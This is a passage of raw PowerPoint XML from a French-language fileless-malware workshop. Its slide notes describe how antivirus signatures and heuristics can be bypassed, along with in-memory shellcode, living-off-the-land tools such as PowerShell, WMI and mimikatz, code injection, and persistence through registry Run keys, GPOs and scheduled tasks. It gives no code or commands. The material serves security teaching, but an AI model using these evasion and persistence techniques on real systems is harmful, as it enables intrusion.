              </a:solidFill>
            </a:rPr>
            <a:t>
</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0">
            <a:solidFill>
              <a:schemeClr val="accent4">
                <a:lumMod val="60000"/>
                <a:lumOff val="40000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="2194569"/>
        <a:ext cx="6169344" cy="2874156"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{453B5C1B-7479-A64C-A62F-F8FF11789102}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="5068726"/>
          <a:ext cx="6175375"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5068726"/>
          <a:ext cx="6175375" cy="146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sz="1600" kern="1200" dirty="0" smtClean="0">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="5068726"/>
        <a:ext cx="6175375" cy="1469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4/15/2021</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12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="78865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fr-FR" dirty="0" smtClean="0"/>
              <a:t>Une signature est l'empreinte numérique d'un logiciel malveillant. Il s'agit d'une chaîne unique de bits, un modèle binaire représentant le logiciel malveillant</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t> - contourner facilement les signatures en modifiant, obscurcissant ou changeant de toute autre manière le code de leurs logiciels malveillants.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="alphaLcParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Examine les propriétés du fichier, telles que la taille du fichier, s'il semble utiliser un ensemble de fonctions dangereuses ou s'il possède des autorisations anormales. Il peut y avoir jusqu'à dix règles en place - contourner les produits AV, qui utilisent des heuristiques, nécessite la connaissance d'une seule caractéristique. La modification de cette seule caractéristique casse l'ensemble de la détection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="alphaLcParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> Est comme une heuristique et cible le comportement réel des logiciels malveillants. Le problème avec cette approche est que le logiciel malveillant doit d'abord s'exécuter avant que le produit antivirus puisse le détecter.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="alphaLcParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>L'AV calcule des hachages sur différentes parties du fichier</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t> - si un seul bit est modifié dans l'une des zones utilisées pour générer les hachages, les hachages produits sont très différents.</a:t>
            </a:r>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21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="270504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8442E7-1E35-4707-8504-AE37222ED5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241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8442E7-1E35-4707-8504-AE37222ED5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24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24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3226988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25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="347174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26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1325305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27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="883078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28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="219006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29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="72622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13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="138669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14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="425150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15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="329639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16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="135117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17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="731170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eriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Relativement facile pour un attaquant d'utiliser un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> pour pousser la charge utile directement dans la mémoire ou le registre sans qu'il reste de fichier résiduel utilisant</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t> les RCE (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>CodeRed,SQLSlammer,EternalBlue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t>) – simple reboot car pas de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>persistence</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t>C'est le terme utilisé pour décrire comment un attaquant peut obtenir une emprise persistante sous Windows sans laisser de charge malveillante sur le disque - cela nécessite la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>persistence</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t> du code malveillant sur le système.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t>L'attaquant utilise les outils existants du système, se dissimule parmi ses scripts et binaires </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>natifs.Des</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t> commandes légitimes peuvent être utilisées par les attaquants comme des portes dérobées (net, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>ipconfig,pwdump,mimikatz,RDP,PsExec,RAR,Zip,Putty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Une sous-classe de la plupart des attaques de type Dual-use. L'outil natif est essentiellement l’emplacement de la charge utile du malware. Ces outils comprennent PowerShell, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>CScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t>, JavaScript ou </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>WScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>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18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="300195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eriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>L'injection de code est une technique dont le but est de compromettre un processus légitime et de lui faire exécuter un code malveillant. Il s'agit d'un moyen d'atteindre la furtivité par l'exécution en mémoire. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Une technique qui utilise des scripts à exécuter directement dans la mémoire. Les scripts sont ensuite interprétés par des applications </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>whitelistés</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>, telles que PowerShell, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>Cscript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>Wscript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>, MSHTA, entre autres.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>"Living off the land" est une technique dans laquelle l'attaque, abuse des outils d'administration du système et des utilitaires intégrés au système, qui implique un chaînage des attaques. Elle utilise des outils d'administration intégrés pour réaliser des activités malveillantes dans le réseau de l'organisation. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> Il parvient à persister en insérant des codes malveillants dans les outils et utilitaires intégrés de Windows, tels que le registre du système, le planificateur de tâches de Windows et le service WMI.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>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19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1361241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eriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Le mécanisme de chargement des </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>fileless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> malware le plus populaire consiste à stocker un script malveillant dans la base des registres de Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Powerlicks,Kovter,Bedep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t>). Le contenu est réparti sur plusieurs sous-clés </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t> et obscurci de sorte que chaque infection aura une valeur différente.  On parle parfois de logiciels malveillants résidant dans le registre. Souvent, le script crée un nouvel objet ActiveX afin de pouvoir utiliser toutes les fonctionnalités étendues. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>WMI offre une multitude de capacités d'administration pour les systèmes locaux et distants.  Il peut être utilisé pour interroger les paramètres du système, arrêter des processus et exécuter des scripts localement ou à distance.  L'interaction est possible par le biais de l'outil de ligne de commande wmic.exe ou par le biais de PowerShell et d'autres scripts qui ont une large intégration. Les données WMI sont stockées codées dans plusieurs fichiers à travers le %System%\ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>wbem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>repository</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>GPOs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> peuvent être utilisés pour ajouter un point de chargement pour un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>backdoor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>.  Par exemple, ils peuvent être utilisés pour créer une clé </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>Run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>deans</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> le registre avec un script PowerShell comme valeur.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Il est possible de créer une nouvelle tâche planifiée qui exécutera une commande à des moments de déclenchement spécifiques sur un système local ou distant.  Par exemple, une commande de téléchargement PowerShell .</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0F8442E7-1E35-4707-8504-AE37222ED57D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="142706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smtClean="0"/>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smtClean="0"/>
              <a:t>Click icon to add picture</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0"/>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smtClean="0"/>
              <a:t>Click icon to add picture</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0"/>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smtClean="0"/>
              <a:t>Click icon to add picture</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0"/>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4/15/2021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4/15/2021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smtClean="0"/>
              <a:t>Click icon to add picture</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0"/>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4/15/2021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smtClean="0"/>
              <a:t>Click icon to add picture</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0"/>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smtClean="0"/>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dirty="0" smtClean="0"/>
              <a:t>FILELESS MALWARE WORKSHOP </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9041450" y="5999148"/>
            <a:ext cx="1709699" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Horea Moldovan</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="217044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a:t>
            </a:r>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26" y="2244711"/>
            <a:ext cx="548039" cy="54803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455837108"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3639736" y="2080008"/>
          <a:ext cx="8128000" cy="2961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813187492"/>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2720333836"/>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977224267"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
                        <a:t>Moyenne</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
                        <a:t>Très haute</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="486711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Moyenne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Très haute</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4283291729"/>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222012658"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="242493804"/>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26" y="2744504"/>
            <a:ext cx="470673" cy="4706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744" y="3215177"/>
            <a:ext cx="360035" cy="36003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352" y="3545268"/>
            <a:ext cx="478747" cy="47874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622" y="3997639"/>
            <a:ext cx="361157" cy="361157"/>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142138456"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1680306" y="2074928"/>
          <a:ext cx="1143279" cy="296672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Code source</a:t>
                      </a:r>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Fichier</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2084593043"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>Procès</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3214466422"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>Complexité</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2403847838"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>Détection</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="272654546"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2656580963"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2300699035"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Right Arrow 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3014504" y="253812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ight Arrow 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3014504" y="2979840"/>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ight Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3015612" y="3364233"/>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ight Arrow 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3014504" y="3745753"/>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ight Arrow 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3014504" y="4099043"/>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66028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a:t>
            </a:r>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26" y="2291096"/>
            <a:ext cx="503729" cy="50372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145086492"/>
              </p:ext>
            </p:extLst>
